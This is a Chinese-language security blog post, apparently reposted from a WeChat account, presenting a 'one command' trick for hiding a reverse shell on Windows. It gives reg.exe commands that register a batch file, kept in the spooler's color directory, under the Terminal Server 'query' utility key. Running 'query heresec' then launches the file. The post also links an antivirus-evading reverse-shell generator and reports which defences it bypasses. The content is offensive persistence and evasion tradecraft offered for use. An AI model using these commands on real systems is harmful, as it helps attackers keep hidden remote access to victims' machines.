用一条命令来隐藏反向Shell

admin
admin
admin
102115
文章
87
评论
2023年5月23日22:58:18评论24 views字数 745阅读2分29秒阅读模式

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

小技巧 | 用一条命令来隐藏反向Shell

小技巧 | 用一条命令来隐藏反向Shell

添加一条,打开计算器。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d01hereseccalc.exe

用一条命令来隐藏反向Shell

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

https://github.com/t3l3machus/hoaxshell

用一条命令来隐藏反向Shell

将命令写入一个bat脚本中,然后添加注册表后执行。

用一条命令来隐藏反向Shell

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.batquery heresec

只需执行命令query heresec即可运行反弹shell脚本。
用一条命令来隐藏反向Shell

还能怎么用,再联想一下。

文章来源:关注安全技术

觉得内容不错,就点下在看
如侵权请私聊公众号删文

原文始发于微信公众号(EchoSec):小技巧 | 用一条命令来隐藏反向Shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月23日22:58:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用一条命令来隐藏反向Shellhttps://cn-sec.com/archives/1753997.html

发表评论

匿名网友 填写信息